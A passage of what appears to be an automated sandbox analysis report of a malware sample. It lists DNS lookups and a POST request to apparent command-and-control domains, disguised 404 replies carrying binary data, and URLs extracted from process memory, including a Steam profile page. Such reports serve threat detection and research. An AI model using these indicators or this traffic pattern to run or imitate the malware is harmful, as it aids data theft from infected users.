https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:22:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:23:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:19 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:24 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:29 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:37 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:42 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:47 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:24:59 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:04 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:11 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:17 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:22 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:30 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:35 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:40 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:48 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:53 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Sun, 26 May 2024 08:25:59 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                Source: explorer.exe, 00000001.00000000.1692944152.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                Source: explorer.exe, 00000001.00000000.1691436456.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692031971.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                Source: explorer.exe, 00000001.00000000.1694837986.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: explorer.exe, 00000001.00000000.1694837986.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.clo
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
